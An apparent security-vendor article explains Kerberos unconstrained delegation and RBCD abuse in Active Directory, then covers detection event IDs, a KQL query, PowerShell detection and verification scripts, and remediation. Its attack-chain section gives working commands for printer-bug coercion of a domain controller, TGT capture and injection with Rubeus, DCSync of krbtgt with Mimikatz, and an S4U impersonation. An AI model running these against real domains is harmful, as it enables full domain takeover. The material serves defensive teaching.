What Is Kerberos Delegation?
Kerberos delegation allows a service to authenticate to other services on behalf of a user. It is a legitimate feature designed for multi-tier applications: a web server needs to access a database as the authenticated user, so Kerberos allows the web server to impersonate that user when connecting to the database.
There are three types of Kerberos delegation, each with very different security implications:
- Unconstrained Delegation: the service receives a copy of the user's TGT and can impersonate that user to any service in the domain
- Constrained Delegation: the service can obtain tickets on behalf of users only for a predefined list of SPNs (msDS-AllowedToDelegateTo); if protocol transition is enabled, it can do so even for users who never authenticated to it with Kerberos
- Resource-Based Constrained Delegation (RBCD): configured on the target resource, whose msDS-AllowedToActOnBehalfOfOtherIdentity attribute lists the accounts allowed to delegate to it
Unconstrained delegation is one of the most dangerous misconfigurations in Active Directory. Combined with an authentication-coercion primitive such as the printer bug, a compromised delegating host yields a Domain Controller's TGT and, from there, Domain Admin.
How It Works
When a user authenticates to a service whose account is trusted for unconstrained delegation, the KDC marks the service ticket ok-as-delegate. The client then requests a forwardable TGT and sends it to the service inside the AP-REQ along with the service ticket. The service caches that TGT in LSASS and can use it to request service tickets as the user to any other service in the domain, for as long as the TGT is valid.
This means: if an attacker compromises a machine configured for unconstrained delegation and can coerce a Domain Controller into authenticating to it, they capture the DC machine account's TGT. That account holds directory replication rights, so the TGT can be used to DCSync the krbtgt hash, which in turn allows a Golden Ticket to be forged.
The usual technique for triggering DC authentication is the printer bug (tooling: SpoolSample, printerbug.py). The MS-RPRN call RpcRemoteFindFirstPrinterChangeNotificationEx makes the Print Spooler on the target machine authenticate to a host of the caller's choosing, and any authenticated domain user can invoke it. Other coercion primitives exist (for example PetitPotam over MS-EFSRPC), so the spooler is the primary vector but not the only one.
The Attack Chain
Step 1 - Find Computers With Unconstrained Delegation
# Find computers with unconstrained delegation, excluding domain controllers
# (PrimaryGroupID 516 = DCs, 521 = RODCs; matching "*DC*" in the name is unreliable)
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, TrustedToAuthForDelegation, PrimaryGroupID |
Where-Object { $_.PrimaryGroupID -notin 516, 521 } |
Select-Object Name, DNSHostName, TrustedForDelegation
# User/service accounts can also be trusted for unconstrained delegation
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties ServicePrincipalName | Select-Object Name, ServicePrincipalName
Step 2 - Compromise the Delegated Machine
The attacker compromises the machine with unconstrained delegation (via local admin access, Kerberoasting a service account that runs on it, or any other method). They now control a host that receives a forwarded TGT from every client that authenticates to it.
Step 3 - Coerce DC Authentication (Printer Bug)
# SpoolSample: coerce the DC to authenticate to the attacker-controlled delegating host (any domain user can call this)
SpoolSample.exe DC01.corp.local COMPROMISED-SERVER.corp.local
# Or printerbug.py from krbrelayx (it is built on Impacket but is not part of the Impacket package)
python3 printerbug.py corp.local/user:password@DC01.corp.local COMPROMISED-SERVER.corp.local
Step 4 - Capture the DC TGT and Escalate
# On the compromised machine (elevated): watch LSASS for new TGTs belonging to the DC machine account
Rubeus.exe monitor /interval:5 /filteruser:DC01$ /nowrap
# Inject the captured base64 .kirbi into the current logon session
Rubeus.exe ptt /ticket:doIFXDCCBVig...
# The DC machine account has replication rights, so DCSync the krbtgt hash (Mimikatz)
lsadump::dcsync /domain:corp.local /user:krbtgt
RBCD Abuse (Constrained Delegation Variant)
Resource-Based Constrained Delegation can be abused by an attacker who can write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a computer object (GenericWrite, GenericAll, WriteDacl or WriteOwner over it) and who controls an account with an SPN, typically a computer account they created themselves if ms-DS-MachineAccountQuota is left at its default of 10. No unconstrained delegation is required:
# Set RBCD: the attacker, holding write access to TARGET-PC's msDS-AllowedToActOnBehalfOfOtherIdentity, adds their own computer account
Set-ADComputer -Identity TARGET-PC -PrincipalsAllowedToDelegateToAccount ATTACKER-PC$
# Then S4U2Self + S4U2Proxy as ATTACKER-PC$ to obtain a ticket for TARGET-PC as a privileged user (Rubeus; <hash> is a placeholder)
Rubeus.exe s4u /user:ATTACKER-PC$ /rc4:<ATTACKER-PC$ NT hash> /impersonateuser:Administrator /msdsspn:cifs/TARGET-PC.corp.local /ptt
Detection
Windows Event IDs
| Event ID | Where logged | What to look for |
|---|---|---|
| 4769 | DC - Security | A DC machine account (e.g. DC01$) requesting a service ticket for a non-DC service; the Service Name is the delegating host's machine account |
| 4624 | Delegated server | Network logon (Type 3) by a DC machine account; on a non-DC host this is suspicious and, following a coercion, almost certainly malicious |
| 5145 | Coerced DC | Access to \\*\IPC$ with RelativeTargetName spoolss from a non-DC source (requires "Audit Detailed File Share" to be enabled) |
Behavioral Anomalies
- DC machine account authenticating to non-DC servers: strong indicator of printer bug coercion
- Service tickets requested by a DC machine account with the forwardable flag set (ticket options such as 0x40810010) for a non-DC service
- Rubeus or Mimikatz artifacts (monitor/ptt command lines, LSASS handle access) on delegation-configured servers
SIEM Detection Query (Elastic KQL)
event.code: "4769" AND
winlog.event_data.TargetUserName: (DC01$ OR DC02$) AND
NOT winlog.event_data.ServiceName: (DC01$ OR DC02$ OR krbtgt)
DC01$ and DC02$ are placeholders: list every DC machine account explicitly. Name-pattern matches such as *DC* produce both false positives and misses, and the default ticket options (0x40810010) are not distinctive enough to filter on.
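To show the three detection rules above as concrete logic, here is an added PowerShell example; it is not code from the original page or from EtcSec. It runs over a handful of constructed Security events (the DC names DC01/DC02, hosts, IPs and timestamps are made up) and correlates a spoolss pipe access on a DC with that DC's machine account reaching out shortly afterwards. In production you would replace the constructed array with objects built from Get-WinEvent.

```powershell
# Added example (not from the original page): correlate 4769 / 4624 / 5145 events for
# unconstrained-delegation coercion. All data below is constructed; field names mirror the
# EventData element names in the Windows Security log.

# Assumption: the DC machine accounts of the environment (live: Get-ADDomainController -Filter * | % { "$($_.Name)$" })
$DcAccounts = @('DC01$', 'DC02$')

# Constructed sample events. 5145 is logged on the coerced DC when the attacker host opens
# spoolss on IPC$; 4769 on the DC issuing the ticket; 4624 on the host the coerced DC connected to.
$SampleEvents = @(
    [pscustomobject]@{ Time='2024-03-01T10:00:00Z'; Id=5145; Computer='DC01';   IpAddress='10.0.0.50'; ShareName='\\*\IPC$'; RelativeTargetName='spoolss'; TargetUserName='jdoe' }
    [pscustomobject]@{ Time='2024-03-01T10:00:02Z'; Id=4769; Computer='DC02';   IpAddress='10.0.0.10'; TargetUserName='DC01$'; ServiceName='WEB01$' }
    [pscustomobject]@{ Time='2024-03-01T10:00:03Z'; Id=4624; Computer='WEB01';  IpAddress='10.0.0.10'; TargetUserName='DC01$'; LogonType=3 }
    [pscustomobject]@{ Time='2024-03-01T10:05:00Z'; Id=4769; Computer='DC02';   IpAddress='10.0.0.10'; TargetUserName='DC01$'; ServiceName='DC02$' }   # DC-to-DC: benign
    [pscustomobject]@{ Time='2024-03-01T10:06:00Z'; Id=4624; Computer='FILE01'; IpAddress='10.0.0.77'; TargetUserName='jdoe';  LogonType=3 }           # normal user logon: benign
)

function Find-DelegationCoercion {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [Parameter(Mandatory)] [string[]] $DcAccounts,
        [int] $WindowSeconds = 120   # how long after a spoolss call the DC's outbound auth still counts as coerced
    )
    $dcHosts = $DcAccounts | ForEach-Object { $_.TrimEnd('$') }
    $alerts  = [System.Collections.Generic.List[object]]::new()

    foreach ($e in $Events) {
        switch ($e.Id) {
            4769 {
                # A DC machine account asking for a ticket to anything but a DC or the KDC itself
                if (($DcAccounts -contains $e.TargetUserName) -and
                    ($DcAccounts -notcontains $e.ServiceName) -and ($e.ServiceName -ne 'krbtgt')) {
                    $alerts.Add([pscustomobject]@{ Time=$e.Time; Rule='DC account requested ticket for non-DC service'; Subject=$e.TargetUserName; Target=$e.ServiceName; Source=$e.IpAddress })
                }
            }
            4624 {
                # Network logon by a DC machine account onto a host that is not a DC
                if (($e.LogonType -eq 3) -and ($DcAccounts -contains $e.TargetUserName) -and ($dcHosts -notcontains $e.Computer)) {
                    $alerts.Add([pscustomobject]@{ Time=$e.Time; Rule='DC account network logon to non-DC host'; Subject=$e.TargetUserName; Target=$e.Computer; Source=$e.IpAddress })
                }
            }
            5145 {
                # The coercion call itself: spoolss named pipe opened on a DC
                if (($e.RelativeTargetName -eq 'spoolss') -and ($dcHosts -contains $e.Computer)) {
                    $alerts.Add([pscustomobject]@{ Time=$e.Time; Rule='spoolss pipe opened on DC (possible printer bug)'; Subject=$e.TargetUserName; Target=$e.Computer; Source=$e.IpAddress })
                }
            }
        }
    }

    # Correlate: a spoolss call against DC X followed within the window by DC X$ reaching out is the full chain
    $spoolCalls = @($alerts | Where-Object { $_.Rule -like 'spoolss*' })
    foreach ($a in $alerts) {
        $t = [datetime]::Parse($a.Time).ToUniversalTime()
        $coerced = $spoolCalls | Where-Object {
            $delta = ($t - [datetime]::Parse($_.Time).ToUniversalTime()).TotalSeconds
            ($_.Target -eq $a.Subject.TrimEnd('$')) -and ($delta -ge 0) -and ($delta -le $WindowSeconds)
        }
        $sev = if ($a.Rule -like 'spoolss*') { 'Info' } elseif ($coerced) { 'High' } else { 'Medium' }
        $a | Add-Member -NotePropertyName Severity -NotePropertyValue $sev
    }
    return $alerts
}

# With the constructed data this yields three rows: the spoolss access on DC01 (Info) and two High
# alerts for DC01$ requesting a ticket for WEB01$ and logging on to WEB01 within the window.
Find-DelegationCoercion -Events $SampleEvents -DcAccounts $DcAccounts |
    Format-Table Time, Severity, Rule, Subject, Target, Source -AutoSize
```

The DC-to-DC 4769 and the ordinary user logon are deliberately included so the rules have something to ignore; a DC machine account requesting tickets for other DCs or krbtgt is normal replication and authentication traffic and must not alert.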
💡 Tip: Disable the Print Spooler service on all Domain Controllers. It is not needed on DCs, and its removal closes the printer-bug coercion vector. Other coercion methods (such as PetitPotam) need their own mitigations, so treat this as a reduction of the attack surface, not a substitute for removing unconstrained delegation.
Remediation
⚠️ Critical: Unconstrained delegation on any server other than Domain Controllers is a critical misconfiguration. Replace with constrained delegation or RBCD immediately.
1. Remove Unconstrained Delegation
# Disable unconstrained delegation on all non-DC computers (PrimaryGroupID 516 = DCs, 521 = RODCs)
# Run once with -WhatIf on Set-ADComputer to review the list before changing anything
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties PrimaryGroupID |
Where-Object { $_.PrimaryGroupID -notin 516, 521 } | ForEach-Object {
    Set-ADComputer -Identity $_ -TrustedForDelegation $false
    Write-Host "Fixed: $($_.Name)"
}
2. Replace With Constrained Delegation
# Configure Kerberos-only constrained delegation to specific SPNs (the front end can only obtain tickets for these)
Set-ADComputer -Identity WebServer -Add @{
    "msDS-AllowedToDelegateTo" = @("MSSQLSvc/sqlserver.corp.local:1433")
}
# Protocol transition ("use any authentication protocol") lets the service obtain tickets for users who never
# authenticated to it with Kerberos (S4U2Self) and is itself a common abuse target: leave it off unless the front end must accept non-Kerberos logons
Set-ADAccountControl -Identity WebServer$ -TrustedToAuthForDelegation $false
# Alternative: configure RBCD on the back end instead, e.g. Set-ADComputer -Identity sqlserver -PrincipalsAllowedToDelegateToAccount WebServer$
3. Disable Print Spooler on Domain Controllers
# Disable and stop the spooler on all DCs (closes the printer-bug vector; confirm no DC is intentionally hosting print queues first)
Invoke-Command -ComputerName (Get-ADDomainController -Filter *).HostName -ScriptBlock {
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
}
4. Audit RBCD Configurations
# Find computers with RBCD configured (msDS-AllowedToActOnBehalfOfOtherIdentity) and resolve who may delegate to them
Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
Where-Object { $_.PrincipalsAllowedToDelegateToAccount } |
Select-Object Name, @{N="AllowedToActOnBehalf";E={ ($_.PrincipalsAllowedToDelegateToAccount | ForEach-Object { (Get-ADObject -Identity $_).Name }) -join ', ' }}
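As an added example (not from the original page or from EtcSec's product), here is a PowerShell verification script to run after steps 1 to 4. It reports every remaining delegation configuration in one table, flags protocol transition on constrained delegation, resolves the principals behind each RBCD entry, and probes whether the spoolss pipe is still reachable on each DC. It assumes the ActiveDirectory module (RSAT) is installed, that the running account can read the domain and reach the DCs over SMB, and that DCs are identified via Get-ADDomainController; the pipe probe reuses the same `\\dc\pipe\spoolss` listing an attacker uses to check for the printer bug.

```powershell
# Added example (not from the original page or EtcSec): post-remediation delegation check.
# Requires the ActiveDirectory module (RSAT) and an account that can read the domain and reach DCs over SMB.
Import-Module ActiveDirectory

function Get-DelegationReport {
    [CmdletBinding()]
    param()

    $dcs = Get-ADDomainController -Filter *

    # 1. Unconstrained delegation: computers that are not DCs (PrimaryGroupID 516/521), plus user/service accounts
    $unconstrained = @(Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties PrimaryGroupID |
                         Where-Object { $_.PrimaryGroupID -notin 516, 521 }) +
                     @(Get-ADUser -Filter {TrustedForDelegation -eq $true})
    foreach ($o in $unconstrained) {
        [pscustomobject]@{ Type='Unconstrained'; Account=$o.SamAccountName; Detail='TrustedForDelegation=True'; Severity='Critical' }
    }

    # 2. Constrained delegation: the allowed SPN list, with protocol transition flagged
    #    (userAccountControl bit 0x1000000 = TRUSTED_TO_AUTH_FOR_DELEGATION, "use any authentication protocol")
    $constrained = Get-ADObject -Filter "msDS-AllowedToDelegateTo -like '*'" -Properties msDS-AllowedToDelegateTo, userAccountControl, sAMAccountName
    foreach ($o in $constrained) {
        $pt = (($o.userAccountControl -band 0x1000000) -ne 0)
        [pscustomobject]@{
            Type     = 'Constrained'
            Account  = $o.sAMAccountName
            Detail   = ($o.'msDS-AllowedToDelegateTo' -join '; ') + $(if ($pt) { ' [protocol transition]' } else { '' })
            Severity = $(if ($pt) { 'High' } else { 'Info' })
        }
    }

    # 3. RBCD: resolve the principals allowed to act on behalf of other identities against each computer
    $rbcd = Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
            Where-Object { $_.PrincipalsAllowedToDelegateToAccount }
    foreach ($c in $rbcd) {
        $who = $c.PrincipalsAllowedToDelegateToAccount | ForEach-Object { (Get-ADObject -Identity $_).Name }
        [pscustomobject]@{ Type='RBCD'; Account=$c.SamAccountName; Detail="allows: $($who -join ', ')"; Severity='Review' }
    }

    # 4. Print Spooler on DCs: the same probe an attacker runs before the printer bug (ls \\dc\pipe\spoolss).
    #    A listing succeeds only while the spoolss pipe exists, i.e. while the spooler is running.
    foreach ($dc in $dcs) {
        $pipe = "\\$($dc.HostName)\pipe\spoolss"
        $reachable = $null -ne (Get-ChildItem -Path $pipe -ErrorAction SilentlyContinue)
        [pscustomobject]@{ Type='SpoolerOnDC'; Account=$dc.HostName; Detail="$pipe reachable=$reachable"; Severity=$(if ($reachable) { 'High' } else { 'Info' }) }
    }
}

# Any Critical or High row means remediation is incomplete; Review rows are RBCD entries to confirm with the application owner
Get-DelegationReport | Sort-Object Type, Severity | Format-Table -AutoSize
```

Run it before and after the remediation steps and diff the two tables: the Unconstrained rows should disappear, Constrained rows should lose their protocol-transition flag unless explicitly justified, and every SpoolerOnDC row should read reachable=False.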
How EtcSec Detects This
EtcSec audits all delegation configurations across every computer and service account in your AD environment.
UNCONSTRAINED_DELEGATION identifies all non-DC computers and service accounts configured with unconstrained delegation: the most critical delegation misconfiguration, enabling full domain compromise via TGT capture.
CONSTRAINED_DELEGATION flags misconfigured constrained delegation settings, including protocol transition abuse and overly broad service lists.
RBCD_ABUSE detects computers where the msDS-AllowedToActOnBehalfOfOtherIdentity attribute is configured in ways that could enable privilege escalation.
ℹ️ Note: EtcSec audits all delegation settings automatically in every AD scan. Run a free audit to identify delegation misconfigurations in your environment.
Related articles: Golden Ticket Attack | Kerberoasting